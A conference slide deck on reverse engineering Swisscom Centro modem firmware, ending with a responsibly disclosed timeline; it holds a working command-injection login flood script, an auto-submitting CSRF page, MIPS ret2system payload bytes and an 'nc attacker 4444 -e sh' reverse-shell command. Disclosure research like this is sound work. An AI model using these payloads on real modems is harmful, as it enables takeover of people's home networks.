Reverse engineering Swisscom’s Centro Grande modems
Alain Mowat & Thomas Imbert
whoami
› Alain Mowat (@plopz0r)
› Head of Audit division at SCRT
› Pentest
› Code review
› Trainings
› Mostly a Web App guy
› Member of 0daysober CTF team
› Watch other people exploiting cool vulns
Background
› Why look into the Swisscom modems?
› Why this talk?
› I don’t actually own a Swisscom modem
› Made it a bit harder to study...
Attack Surface
› ADB# show netstat
tcp 0 0 192.168.1.1:50602 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:9034 0.0.0.0:* LISTEN
tcp 11 0 192.168.1.1:8080 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:53 0.0.0.0:* LISTEN
tcp 0 0 192.168.1.1:22 0.0.0.0:* LISTEN
tcp 0 0 192.168.1.1:23 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:7547 0.0.0.0:* LISTEN
udp 0 0 0.0.0.0:9090 0.0.0.0:*
udp 0 0 127.0.0.1:15000 0.0.0.0:*
udp 0 0 0.0.0.0:53 0.0.0.0:*
udp 0 0 0.0.0.0:323 0.0.0.0:*
udp 0 0 0.0.0.0:67 0.0.0.0:*
udp 0 0 0.0.0.0:68 0.0.0.0:*
udp 0 0 178.199.180.148:5060 0.0.0.0:*
udp 0 0 192.168.1.1:5351 0.0.0.0:*
udp 0 0 0.0.0.0:1900 0.0.0.0:*
udp 0 0 192.168.1.1:47863 0.0.0.0:*
udp 0 0 0.0.0.0:123 0.0.0.0:*
udp 0 0 ff02::1:2:547 :::*
udp 0 0 :::53 :::*
udp 0 0 :::323 :::*
udp 0 0 :::123 :::*
raw 0 0 0.0.0.0:2 0.0.0.0:* 2
raw 0 0 0.0.0.0:6 0.0.0.0:* 6
raw 0 0 :::58 :::*
Attack Surface
› ADB# show processes
256 0 2040 S logd
259 0 1308 S klogd -c3
271 0 832 S ec
343 0 3236 S cm
350 0 0 SW [dsl0]
363 0 0 SW [bcmsw]
364 0 0 SW [bcmsw_timer]
365 0 0 SW< [linkwatch]
5889 0 1132 S dropbear -P /tmp/dropbear-local.pid -l 20 -p 192.168
6227 0 1312 S telnetd Local -u 20 -b 192.168.1.1:23 -I 300
6898 65534 2292 S nhttpd -c /tmp/nhttpd.conf
7362 0 1000 S dhcps /tmp/dhcps.conf
7910 0 764 S dns
8014 0 1088 S miniupnpd -i ptm0 -a 192.168.1.1 -N -I 4
8026 0 736 S /bin/wpspbc
8223 0 2676 S /usr/sbin/hostapd -B /tmp/wlan/config/hostapd.conf
9164 0 1664 S /bin/sh /etc/rc.common /etc/rc.d/S11services.sh boot
9177 0 2940 S cwmp
9204 0 1316 S /bin/sh /etc/ah/printk_dump.sh
9353 0 884 S ec
9553 0 1312 S /bin/sh /etc/ah/procSentinel.sh cm 300
11846 0 1332 S /bin/sh DHCPv4Client.sh
11848 0 1320 S udhcpc -S -R -f -W rgH7sqo?h@5Y -t 500000 -T 4 -o -C
14753 0 792 S igmpproxy -c /tmp/igmpproxy.conf -p /tmp/igmpproxy.p
15287 0 3576 S voip
15688 0 740 S tproxyd 80 8080 1 192.168.1.1 /ui/swc/parentalcontro
15923 0 1056 S N chronyd -f /tmp/chrony.conf
16770 0 820 S radvd
16812 0 2036 S dibbler-server start
Finding the firmware
› Locate the firmware
› https://www.swisscom.ch/en/residential/help/device/internet-router/centro-grande.html
› Vx226x1_61400.sig
› Version at the time
› 6.14.00
Extracting the firmware
› Binwalk (https://github.com/devttys0/binwalk)
› Firmware modification kit
› ./extract-firmware.sh
CPE WAN Management Protocol
› Also known as TR-069
› Protocol that defines how to manage « Customer-premises Equipment »
› cwmp binary
› Listens to 0.0.0.0:7547
› iptables rule allows access only from certain Swisscom subnets
Web interface
› Web server is nhttpd (http://www.nazgul.ch/dev_nostromo.html)
› If a binary file is requested through the web interface, nhttpd executes it
› Directory traversal → Code Exec in version 1.9.3
Web interface
› Mostly managed by a CGI called ui
Emulating the device
› OpenWRT (https://openwrt.org/)
› Linux distribution for embedded devices
› Qemu (http://wiki.qemu.org/Main_Page)
› Machine emulator and virtualizer
Configuring OpenWRT
› make menuconfig
› MIPS target
› Add all debugging and networking tools
› Cross-compile nhttpd
› Generate ramdisk
› Copy Swisscom firmware files to the image
› Run image with qemu
› qemu-system-mips -kernel openwrt-malta-be-vmlinux-initramfs.elf -net tap -net nic -nographic -m 2048
Setting up the image
› nhttpd server
serverroot /www
serveradmin webmaster@adbglobal.com
servermimes conf/mimes
docroot /www/htdocs
docindex lanhosts
logpid /tmp/logs
user nobody
disablehttp 0
notfound 501
sslport 443
sslcert /etc/certs/server.crt
sslcertkey /etc/certs/server.key
sslcertca /etc/certs/ca.pem
sslcertreq *
serverlisten 0.0.0.0
servername localhost
Web interface
YAPL ?
Web request overview
› Flow (diagram): POST /ui/swc/login → nhttpd → ui CGI (environment setup; gets the corresponding YAPL « script »: swc_login.yapl, swc_common.yapl, swc_firewall.yapl, ...) → configuration command → cm
Configuration manager
› Used to view and modify the device’s configuration
› Bound to localhost:9034
› Also /tmp/cmctl socket
› Several possible commands
› GETO, GETV, …
› SET, SETM, …
› RESET, REBOOT, ...
› DUMP, EXPORT, ...
Mandatory IDA graph
Configuration manager
› Main loop (pseudocode reconstructed from the binary)
def handleRequest(input):
    type = validateRequestType(input)
    params = validateRequestParams(input)
    callTypeHandler(params)

listen on localhost port 9034
socket = accept()
while 1:
    # whatever one recv() returns is handled as one complete command;
    # nothing delimits or reassembles requests across reads
    input = socket.recv(16384)
    handleRequest(input)
Configuration Manager
Finalizing the image setup
udhcpc -i br-lan
cm
touch /tmp/cmctl
chmod 777 /tmp/cmctl
nhttpd -c /www/nhttpd.cfg
nc localhost 9034
DOM Device /etc/cm/tr181/dom/
DOM InternetGatewayDevice /etc/cm/tr098/dom/
CONF /etc/cm/conf/
ADD InternetGatewayDevice.WANDevice
ADD InternetGatewayDevice.WANDevice.1.WANConnectionDevice
ADD InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection
SET Device.IP.Interface.1.IPv4Address.1.X_ADB_TR098Reference InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection.1
SET Device.ManagementServer.X_ADB_ConnectionRequestInterface Device.IP.Interface.1
SET Device.IP.Interface.1.Status Up
SET Device.Ethernet.Link.1.Name br-lan
SET Device.DeviceInfo.SerialNumber 123456
SET Device.IP.Interface.1.X_ADB_Upstream true
SET Device.IP.Interface.1.X_ADB_TR098Reference InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection.1
Running image
Configuration manager
› Special syntax
› Similar to SQL in certain ways
› SELECT =~ GETV
› UPDATE =~ SET
› Conditions
› GETO A.B.C.[Test=1]
› GETO A.B.C.[Test~1]
› GETO A.B.C.[Test!1]
Vulnerability #1 : Command overflow
› Each call to recv is treated as a new command
› By sending more than 16384 characters, we can craft a new configuration command
› Logging in to the web interface generates a call to the configuration manager that looks like this
› GETO Users.User.[Username=ATTACKER_CONTROLLED]
› By providing a long username, we can exceed the 16384 limit and generate a new request within the configuration manager
› Allows complete control over the device
› Change passwords
› Allow remote access
› ...
Vulnerability #1 : Command overflow
› Sequence (diagram): ui → cm
› ui sends: GETO Users.User.[Username=AAAA[…]AAAAREBOOT\n
› cm: the first recv(16384) returns the GETO command, the second recv(16384) returns REBOOT\n
› cm: process(‘GETO Users……’), then process(‘REBOOT’)
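As an added example (not code from the talk or from ADB), this C models the cm main loop described above against a constructed stand-in for the socket: the unframed loop dispatches whatever one recv(16384) returns, so the oversized login query splits into a GETO followed by a REBOOT, while a newline-framed reader with a length cap rejects the same bytes as one oversized command. The 26-byte GETO prefix and the 16358-character username come from the slides; the trailing "]", the 4096-byte MAX_CMD cap and all function names are assumptions.

```c
#include <string.h>

#define RECV_SIZE 16384   /* bytes read per recv() in cm, from the slide */
#define MAX_CMD   4096    /* command length cap for the hardened framer (assumption) */

/* Constructed stand-in for a connected TCP socket, handed out in chunks of at most n bytes. */
typedef struct { const char *data; size_t len, pos; } fake_sock;

static size_t fake_recv(fake_sock *s, char *buf, size_t n)
{
    size_t left = s->len - s->pos, take = left < n ? left : n;
    memcpy(buf, s->data + s->pos, take);
    s->pos += take;
    return take;
}

/* Copies the command verb (bytes before the first space or newline) into verb. */
static void command_verb(const char *cmd, size_t len, char verb[16])
{
    size_t i = 0;
    while (i < len && i < 15 && cmd[i] != ' ' && cmd[i] != '\n') { verb[i] = cmd[i]; i++; }
    verb[i] = '\0';
}

/* Vulnerable model of the cm main loop: whatever one recv() returns is dispatched as
 * one complete command. Returns the dispatched count; last verb is left in last_verb. */
static int cm_loop_vulnerable(fake_sock *s, char last_verb[16])
{
    static char buf[RECV_SIZE];
    int dispatched = 0;
    size_t n;
    while ((n = fake_recv(s, buf, sizeof buf)) > 0) {
        command_verb(buf, n, last_verb);         /* handleRequest(buf) */
        dispatched++;
    }
    return dispatched;
}

/* Hardened framer: a command is the bytes up to a newline, however recv() chunks them,
 * and one longer than MAX_CMD is rejected (-1) rather than split or dispatched. */
static int cm_loop_framed(fake_sock *s, char last_verb[16])
{
    static char cmd[MAX_CMD], buf[RECV_SIZE];
    size_t cmdlen = 0, n, i;
    int dispatched = 0;
    last_verb[0] = '\0';
    while ((n = fake_recv(s, buf, sizeof buf)) > 0) {
        for (i = 0; i < n; i++) {
            if (buf[i] != '\n') {
                if (cmdlen == MAX_CMD) return -1; /* oversized command: fail closed */
                cmd[cmdlen++] = buf[i];
                continue;
            }
            command_verb(cmd, cmdlen, last_verb); /* handleRequest(cmd) */
            dispatched++;
            cmdlen = 0;
        }
    }
    return dispatched;
}

/* Constructed query as ui would build it for the slide's payload: the 26-byte prefix plus
 * 16358 'a' fills exactly one recv(), then "REBOOT\n]" follows (closing bracket assumed). */
static size_t build_overflow_query(char *out, size_t outsz)
{
    const char *prefix = "GETO Users.User.[Username=", *tail = "REBOOT\n]";
    size_t p = strlen(prefix), total = RECV_SIZE + strlen(tail);
    if (outsz < total) return 0;
    memcpy(out, prefix, p);
    memset(out + p, 'a', RECV_SIZE - p);
    memcpy(out + RECV_SIZE, tail, strlen(tail));
    return total;
}

/* 1 when the unframed loop dispatches two commands, the second being REBOOT. */
static int demo_vulnerable_splits_command(void)
{
    static char msg[RECV_SIZE + 64];
    char verb[16];
    fake_sock s = { msg, build_overflow_query(msg, sizeof msg), 0 };
    return cm_loop_vulnerable(&s, verb) == 2 && strcmp(verb, "REBOOT") == 0;
}

/* 1 when the framed reader rejects the same bytes as one oversized command. */
static int demo_framed_rejects_overflow(void)
{
    static char msg[RECV_SIZE + 64];
    char verb[16];
    fake_sock s = { msg, build_overflow_query(msg, sizeof msg), 0 };
    return cm_loop_framed(&s, verb) == -1;
}

/* 1 when an ordinary login query is still dispatched once, as GETO. */
static int demo_framed_accepts_normal(void)
{
    const char *msg = "GETO Users.User.[Username=alice]\n";
    char verb[16];
    fake_sock s = { msg, strlen(msg), 0 };
    return cm_loop_framed(&s, verb) == 1 && strcmp(verb, "GETO") == 0;
}
```

Framing alone closes the chunk-boundary trick; the ui side should still reject control characters in the username before building the query.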
Exploit #1 : Command overflow
from requests import post

payload = dict()
# the 26-byte "GETO Users.User.[Username=" prefix plus 16358 'a' fills one
# 16384-byte recv(); "REBOOT\n" is then received as a separate command
payload['userName'] = (16358) * 'a' + 'REBOOT' + '\n'
payload['userPwd'] = 'a'
payload['login'] = 'Login'
payload['language'] = ''
while 1:
    r = post('http://192.168.1.1/ui/swc/login/index', data=payload)
DEMO
Vulnerability #2 : Login CSRF
› Use CSRF to exploit someone else’s device
<html>
<body>
<form method="POST" action="http://192.168.1.1/ui/swc/login/index">
<input type="hidden" name="userName" value="aaaaaaaaaa[...]aaaREBOOT%0a"/>
<input type="hidden" name="userPwd" value="a"/>
<input type="hidden" name="login" value="login"/>
<input type="hidden" name="language" value=""/>
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Exposed web interfaces – Centro Business
Vulnerability #3 : Buffer overflow(s)
› Buffer overflow when parsing the name of XML files when performing certain commands (CONF, DOM, …)
› Requirements
› Arbitrarily-named XML file on the device
› file and folder are both limited to 4096 in size
parseFilesInFolder(folder):
    char path[4096];
    files = scandir(folder)
    for file in files:
        if file ends with ".xml":
            strncat(path, folder, 4096)   # bound applies to the source, not to path's remaining space
            strncat(path, file, 4096)     # folder + file may total up to 8192 bytes in a 4096-byte buffer
            parseFile(path)
Exploit #3 : Creating the XML file
› The PATHSAVE command takes 2 arguments
› An XML filename
› Property that needs to be saved
› PATHSAVE /tmp/test.xml Users.User.1.Password
› Can use this to write an arbitrarily-named file on the device
› Exploit can then be triggered by prepending folder with lots of /
› CONF /////////////////////////////////////[…]/tmp/exploit.xml
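As an added example (not code from the talk or from ADB), this C models the byte count of the two strncat calls from the previous slide instead of performing the overflow, and sets a bounds-checked builder beside them; the slash-padded folder is constructed in the shape of the CONF trigger above. PATH_BUF, append_bounded, build_path_safe, make_slash_folder and the sample file names are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define PATH_BUF 4096   /* size of cm's stack buffer path[4096], from the slide */

/* Bytes the slide's sequence writes into path[4096]:
 *     strncat(path, folder, 4096); strncat(path, file, 4096);
 * strncat's third argument bounds the source only, so each call may append up
 * to 4096 bytes plus a NUL; the destination's remaining space is never checked. */
static size_t vulnerable_bytes_written(const char *folder, const char *file)
{
    size_t f = strlen(folder), g = strlen(file);
    if (f > PATH_BUF) f = PATH_BUF;
    if (g > PATH_BUF) g = PATH_BUF;
    return f + g + 1;                       /* +1 for the terminating NUL */
}

/* 1 when the vulnerable build would write past the end of path[4096]. */
static int vulnerable_overflows(const char *folder, const char *file)
{
    return vulnerable_bytes_written(folder, file) > PATH_BUF;
}

/* Hardened append: bounded by the destination's remaining space, fails closed. */
static int append_bounded(char *dst, size_t dstsz, const char *src)
{
    size_t used = 0, need = strlen(src);
    while (used < dstsz && dst[used] != '\0') used++;
    if (used >= dstsz || need >= dstsz - used)
        return -1;                          /* src plus NUL would not fit */
    memcpy(dst + used, src, need + 1);
    return 0;
}

/* Hardened replacement for the two strncat calls: 0 on success, -1 if the
 * combined name does not fit (out is then an empty string). */
static int build_path_safe(char *out, size_t outsz, const char *folder, const char *file)
{
    if (outsz == 0) return -1;
    out[0] = '\0';
    if (append_bounded(out, outsz, folder) < 0 || append_bounded(out, outsz, file) < 0) {
        out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Constructed folder argument in the shape of the slide's trigger
 * ("CONF ////[...]/tmp/"): nslash leading slashes followed by tail. */
static void make_slash_folder(char *buf, size_t bufsz, size_t nslash, const char *tail)
{
    size_t t = strlen(tail);
    if (nslash + t + 1 > bufsz) nslash = bufsz - t - 1;
    memset(buf, '/', nslash);
    memcpy(buf + nslash, tail, t + 1);
}

/* Worked case: a 4095-byte folder plus "exploit.xml" needs 4107 bytes, so the
 * vulnerable build overflows while the hardened one refuses. Returns 1 when
 * both observations hold. */
static int demo_long_folder(void)
{
    static char folder[PATH_BUF + 64];
    char path[PATH_BUF];
    make_slash_folder(folder, sizeof folder, 4090, "/tmp/");     /* 4095 chars */
    int vuln = vulnerable_overflows(folder, "exploit.xml");
    int safe = build_path_safe(path, sizeof path, folder, "exploit.xml");
    return vuln == 1 && safe == -1 && path[0] == '\0';
}

/* Control case: an ordinary folder and file are accepted by both versions. */
static int demo_normal_folder(void)
{
    char path[PATH_BUF];
    int vuln = vulnerable_overflows("/etc/cm/conf/", "device.xml");
    int safe = build_path_safe(path, sizeof path, "/etc/cm/conf/", "device.xml");
    return vuln == 0 && safe == 0 && strcmp(path, "/etc/cm/conf/device.xml") == 0;
}

int main(void)
{
    printf("long folder: vulnerable overflows, hardened rejects -> %d\n", demo_long_folder());
    printf("normal folder: both accept -> %d\n", demo_normal_folder());
    return 0;
}
```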
Exploit #3 : Exploiting a MIPS binary
› (figure: disassembly of the function prologue and epilogue)
Exploit #3 : Exploiting a MIPS binary
› No ASLR on the device
› No NX
› No canaries
› A version of nc with the -e switch is present on the device
› Try to call system(‘nc attacker 4444 -e sh’)
› Arguments are not passed on the stack though, but in registers
› $a0
› $a1
› …
Exploit #3 : ret2system
› Quick analysis gives address of system in libUclibc (Centro business) :
› Libuclibc base : 0x2aaf8000
› System is at offset : 0x54610
› Real address : 0x2ab4c610
› Need a gadget in order to get our argument to system in $a0
› Make $a0 point to address in the stack
› $s0 is also under our control
Exploit #3 : ret2system
› Crafted filename (annotated figure):
/tmp/aaaaaaaaaaaaaaaa\x2a\xb4\xc6\x10bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb\x2a\xb1\xca\xacaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaareboot;#bbbb.xml
› $s0 → system (\x2a\xb4\xc6\x10 = 0x2ab4c610)
› $ra → gadget (\x2a\xb1\xca\xac)
› 64 * ‘a’ of padding, so that the gadget’s addiu $a0,$sp,64 makes $a0 point at the command on the stack
› command: reboot;
Exploit #3 : Full exploit (DEMO)
Disclosure timeline
› 9 September 2015 : Initial disclosure to Swisscom
› 10 September 2015 : Vulnerabilities acknowledged by Swisscom
› 11 September 2015 : Vendor notified (ADB)
› 18 September 2015 : Confirmation of vulns & quick fix available
› 24 September 2015 : Test of quick fix
› 29 September 2015 : Contact with ADB
› October 2015 : Rollout of quick fix to all devices
› January 2016 : Status of full fix :
› Centro grande : 100 %
› Centro Business 1.0 : 50 %
› Centro Business 2.0 : 100 %
› 13 June 2016 : Disclosure
Swisscom bounty
› Combination of flaws rewarded with 3’000 CHF
› Donated to the Ligue Vaudoise contre le Cancer
› Swisscom Bug Bounty program is up & running
› Talk is tomorrow afternoon :)
Conclusions
› Attackers
› Look into other processes on the modem
› miniupnp
› voip
› Embedded devices are found everywhere nowadays
› Huge attack surface
› Fewer people reverse firmware than hunt for XSS
› Defenders
› Consider 0days in your penetration tests
› Test your defense in depth
› Test your ability to detect breaches

More Related Content

What's hot

Distributed Server
Distributed ServerDistributed Server
Distributed Server
Rajan Kumar
 
XPDDS17: Reworking the ARM GIC Emulation & Xen Challenges in the ARM ITS Emu...
XPDDS17:  Reworking the ARM GIC Emulation & Xen Challenges in the ARM ITS Emu...XPDDS17:  Reworking the ARM GIC Emulation & Xen Challenges in the ARM ITS Emu...
XPDDS17: Reworking the ARM GIC Emulation & Xen Challenges in the ARM ITS Emu...
The Linux Foundation
 
Logical Clocks (Distributed computing)
Logical Clocks (Distributed computing)Logical Clocks (Distributed computing)
Logical Clocks (Distributed computing)
Sri Prasanna
 

What's hot (20)

Distributed Server
Distributed ServerDistributed Server
Distributed Server
 
CS9222 ADVANCED OPERATING SYSTEMS
CS9222 ADVANCED OPERATING SYSTEMSCS9222 ADVANCED OPERATING SYSTEMS
CS9222 ADVANCED OPERATING SYSTEMS
 
Message queues
Message queuesMessage queues
Message queues
 
Advanced backup methods (Postgres@CERN)
Advanced backup methods (Postgres@CERN)Advanced backup methods (Postgres@CERN)
Advanced backup methods (Postgres@CERN)
 
Contemporary Linux Networking
Contemporary Linux NetworkingContemporary Linux Networking
Contemporary Linux Networking
 
Load balancing
Load balancingLoad balancing
Load balancing
 
Secure Your REST API (The Right Way)
Secure Your REST API (The Right Way)Secure Your REST API (The Right Way)
Secure Your REST API (The Right Way)
 
MongoDB World 2019: MongoDB Read Isolation: Making Your Reads Clean, Committe...
MongoDB World 2019: MongoDB Read Isolation: Making Your Reads Clean, Committe...MongoDB World 2019: MongoDB Read Isolation: Making Your Reads Clean, Committe...
MongoDB World 2019: MongoDB Read Isolation: Making Your Reads Clean, Committe...
 
App armor structure
App armor structureApp armor structure
App armor structure
 
XPDDS17: Reworking the ARM GIC Emulation & Xen Challenges in the ARM ITS Emu...
XPDDS17:  Reworking the ARM GIC Emulation & Xen Challenges in the ARM ITS Emu...XPDDS17:  Reworking the ARM GIC Emulation & Xen Challenges in the ARM ITS Emu...
XPDDS17: Reworking the ARM GIC Emulation & Xen Challenges in the ARM ITS Emu...
 
Red Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATARed Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATA
 
Fault tolerance
Fault toleranceFault tolerance
Fault tolerance
 
Introduction to Parallel and Distributed Computing
Introduction to Parallel and Distributed ComputingIntroduction to Parallel and Distributed Computing
Introduction to Parallel and Distributed Computing
 
Logical Clocks (Distributed computing)
Logical Clocks (Distributed computing)Logical Clocks (Distributed computing)
Logical Clocks (Distributed computing)
 
Mobageの技術を体験(MyDNS編)
Mobageの技術を体験(MyDNS編)Mobageの技術を体験(MyDNS編)
Mobageの技術を体験(MyDNS編)
 
Linux Performance Profiling and Monitoring
Linux Performance Profiling and MonitoringLinux Performance Profiling and Monitoring
Linux Performance Profiling and Monitoring
 
TRex Traffic Generator - Hanoch Haim
TRex Traffic Generator - Hanoch HaimTRex Traffic Generator - Hanoch Haim
TRex Traffic Generator - Hanoch Haim
 
Galera Cluster Best Practices for DBA's and DevOps Part 1
Galera Cluster Best Practices for DBA's and DevOps Part 1Galera Cluster Best Practices for DBA's and DevOps Part 1
Galera Cluster Best Practices for DBA's and DevOps Part 1
 
[Defcon] Hardware backdooring is practical
[Defcon] Hardware backdooring is practical[Defcon] Hardware backdooring is practical
[Defcon] Hardware backdooring is practical
 
Fun with Network Interfaces
Fun with Network InterfacesFun with Network Interfaces
Fun with Network Interfaces
 

Viewers also liked

3 d pie chart circular puzzle with hole in center process 12 stages style 2 p...
3 d pie chart circular puzzle with hole in center process 12 stages style 2 p...3 d pie chart circular puzzle with hole in center process 12 stages style 2 p...
3 d pie chart circular puzzle with hole in center process 12 stages style 2 p...
SlideTeam.net
 
ציפיות הלקוח, תפיסת השירות של המחר
ציפיות הלקוח, תפיסת השירות של המחרציפיות הלקוח, תפיסת השירות של המחר
ציפיות הלקוח, תפיסת השירות של המחר
hachamd
 
домашние любимцы
домашние любимцыдомашние любимцы
домашние любимцы
Orlovatania
 
SharePoint Saturday Philly - To the Cloud
SharePoint Saturday Philly - To the CloudSharePoint Saturday Philly - To the Cloud
SharePoint Saturday Philly - To the Cloud
Dan Usher
 

Viewers also liked (20)

Hacking the swisscom modem
Hacking the swisscom modemHacking the swisscom modem
Hacking the swisscom modem
 
Introduction to HTML5+CSS
Introduction to HTML5+CSSIntroduction to HTML5+CSS
Introduction to HTML5+CSS
 
The Mall of the World
The Mall of the WorldThe Mall of the World
The Mall of the World
 
BAFC233
BAFC233BAFC233
BAFC233
 
Three tier application
Three tier applicationThree tier application
Three tier application
 
весь-журнал
весь-журналвесь-журнал
весь-журнал
 
3 d pie chart circular puzzle with hole in center process 12 stages style 2 p...
3 d pie chart circular puzzle with hole in center process 12 stages style 2 p...3 d pie chart circular puzzle with hole in center process 12 stages style 2 p...
3 d pie chart circular puzzle with hole in center process 12 stages style 2 p...
 
Charcoal drawing portfolio 2013
Charcoal drawing portfolio 2013Charcoal drawing portfolio 2013
Charcoal drawing portfolio 2013
 
October Newsletter
October NewsletterOctober Newsletter
October Newsletter
 
Adobe Q1 2016 Quarterly Earnings
Adobe Q1 2016 Quarterly EarningsAdobe Q1 2016 Quarterly Earnings
Adobe Q1 2016 Quarterly Earnings
 
Aimopp For Presentation
Aimopp For PresentationAimopp For Presentation
Aimopp For Presentation
 
Contract - what roles we do
Contract - what roles we doContract - what roles we do
Contract - what roles we do
 
ציפיות הלקוח, תפיסת השירות של המחר
ציפיות הלקוח, תפיסת השירות של המחרציפיות הלקוח, תפיסת השירות של המחר
ציפיות הלקוח, תפיסת השירות של המחר
 
Entrepreneurial Journeys - Part 1
Entrepreneurial Journeys - Part 1Entrepreneurial Journeys - Part 1
Entrepreneurial Journeys - Part 1
 
Web Mining e analisi di reti sociali
Web Mining e analisi di reti socialiWeb Mining e analisi di reti sociali
Web Mining e analisi di reti sociali
 
Attractions in the majestic city of Kandy
Attractions in the majestic city of KandyAttractions in the majestic city of Kandy
Attractions in the majestic city of Kandy
 
Guia de estudio mapa
Guia de estudio mapaGuia de estudio mapa
Guia de estudio mapa
 
домашние любимцы
домашние любимцыдомашние любимцы
домашние любимцы
 
SharePoint Saturday Philly - To the Cloud
SharePoint Saturday Philly - To the CloudSharePoint Saturday Philly - To the Cloud
SharePoint Saturday Philly - To the Cloud
 
Dropbox
Dropbox Dropbox
Dropbox
 

Similar to Reverse engineering Swisscom's Centro Grande Modem

Crash_Report_Mechanism_In_Tizen
Crash_Report_Mechanism_In_TizenCrash_Report_Mechanism_In_Tizen
Crash_Report_Mechanism_In_Tizen
Lex Yu
 
05 module managing your network enviornment
05  module managing your network enviornment05  module managing your network enviornment
05 module managing your network enviornment
Asif
 
SCADA Strangelove: Hacking in the Name
SCADA Strangelove: Hacking in the NameSCADA Strangelove: Hacking in the Name
SCADA Strangelove: Hacking in the Name
Positive Hack Days
 
SCADA Strangelove: взлом во имя
SCADA Strangelove: взлом во имяSCADA Strangelove: взлом во имя
SCADA Strangelove: взлом во имя
Ekaterina Melnik
 
HKG18-TR14 - Postmortem Debugging with Coresight
HKG18-TR14 - Postmortem Debugging with CoresightHKG18-TR14 - Postmortem Debugging with Coresight
HKG18-TR14 - Postmortem Debugging with Coresight
Linaro
 
USENIX ATC 2017 Performance Superpowers with Enhanced BPF
USENIX ATC 2017 Performance Superpowers with Enhanced BPFUSENIX ATC 2017 Performance Superpowers with Enhanced BPF
USENIX ATC 2017 Performance Superpowers with Enhanced BPF
Brendan Gregg
 

Similar to Reverse engineering Swisscom's Centro Grande Modem (20)

Debugging linux issues with eBPF
Debugging linux issues with eBPFDebugging linux issues with eBPF
Debugging linux issues with eBPF
 
Linux 系統管理與安全:進階系統管理系統防駭與資訊安全
Linux 系統管理與安全:進階系統管理系統防駭與資訊安全Linux 系統管理與安全:進階系統管理系統防駭與資訊安全
Linux 系統管理與安全:進階系統管理系統防駭與資訊安全
 
Crash_Report_Mechanism_In_Tizen
Crash_Report_Mechanism_In_TizenCrash_Report_Mechanism_In_Tizen
Crash_Report_Mechanism_In_Tizen
 
PFIセミナー資料 H27.10.22
PFIセミナー資料 H27.10.22PFIセミナー資料 H27.10.22
PFIセミナー資料 H27.10.22
 
Debugging Ruby
Debugging RubyDebugging Ruby
Debugging Ruby
 
Debugging Ruby Systems
Debugging Ruby SystemsDebugging Ruby Systems
Debugging Ruby Systems
 
Docker and friends at Linux Days 2014 in Prague
Docker and friends at Linux Days 2014 in PragueDocker and friends at Linux Days 2014 in Prague
Docker and friends at Linux Days 2014 in Prague
 
hacking-embedded-devices.pptx
hacking-embedded-devices.pptxhacking-embedded-devices.pptx
hacking-embedded-devices.pptx
 
05 module managing your network enviornment
05  module managing your network enviornment05  module managing your network enviornment
05 module managing your network enviornment
 
C&C Botnet Factory
C&C Botnet FactoryC&C Botnet Factory
C&C Botnet Factory
 
Osol Pgsql
Osol PgsqlOsol Pgsql
Osol Pgsql
 
OT Security - h-c0n 2020
OT Security - h-c0n 2020OT Security - h-c0n 2020
OT Security - h-c0n 2020
 
Labs_BT_20221017.pptx
Labs_BT_20221017.pptxLabs_BT_20221017.pptx
Labs_BT_20221017.pptx
 
SCADA Strangelove: Hacking in the Name
SCADA Strangelove: Hacking in the NameSCADA Strangelove: Hacking in the Name
SCADA Strangelove: Hacking in the Name
 
SCADA Strangelove: взлом во имя
SCADA Strangelove: взлом во имяSCADA Strangelove: взлом во имя
SCADA Strangelove: взлом во имя
 
HKG18-TR14 - Postmortem Debugging with Coresight
HKG18-TR14 - Postmortem Debugging with CoresightHKG18-TR14 - Postmortem Debugging with Coresight
HKG18-TR14 - Postmortem Debugging with Coresight
 
A little systemtap
A little systemtapA little systemtap
A little systemtap
 
A little systemtap
A little systemtapA little systemtap
A little systemtap
 
USENIX ATC 2017 Performance Superpowers with Enhanced BPF
USENIX ATC 2017 Performance Superpowers with Enhanced BPFUSENIX ATC 2017 Performance Superpowers with Enhanced BPF
USENIX ATC 2017 Performance Superpowers with Enhanced BPF
 
Time Series Database and Tick Stack
Time Series Database and Tick StackTime Series Database and Tick Stack
Time Series Database and Tick Stack
 

More from Cyber Security Alliance

Killing any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureKilling any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented feature
Cyber Security Alliance
 

More from Cyber Security Alliance (20)

Bug Bounty @ Swisscom
Bug Bounty @ SwisscomBug Bounty @ Swisscom
Bug Bounty @ Swisscom
 
Robots are among us, but who takes responsibility?
Robots are among us, but who takes responsibility?Robots are among us, but who takes responsibility?
Robots are among us, but who takes responsibility?
 
iOS malware: what's the risk and how to reduce it
iOS malware: what's the risk and how to reduce itiOS malware: what's the risk and how to reduce it
iOS malware: what's the risk and how to reduce it
 
Why huntung IoC fails at protecting against targeted attacks
Why huntung IoC fails at protecting against targeted attacksWhy huntung IoC fails at protecting against targeted attacks
Why huntung IoC fails at protecting against targeted attacks
 
Corporations - the new victims of targeted ransomware
Corporations - the new victims of targeted ransomwareCorporations - the new victims of targeted ransomware
Corporations - the new victims of targeted ransomware
 
Blockchain for Beginners
Blockchain for Beginners Blockchain for Beginners
Blockchain for Beginners
 
Le pentest pour les nuls #cybsec16
Le pentest pour les nuls #cybsec16Le pentest pour les nuls #cybsec16
Le pentest pour les nuls #cybsec16
 
Introducing Man in the Contacts attack to trick encrypted messaging apps
Introducing Man in the Contacts attack to trick encrypted messaging appsIntroducing Man in the Contacts attack to trick encrypted messaging apps
Introducing Man in the Contacts attack to trick encrypted messaging apps
 
Understanding the fundamentals of attacks
Understanding the fundamentals of attacksUnderstanding the fundamentals of attacks
Understanding the fundamentals of attacks
 
Rump : iOS patch diffing
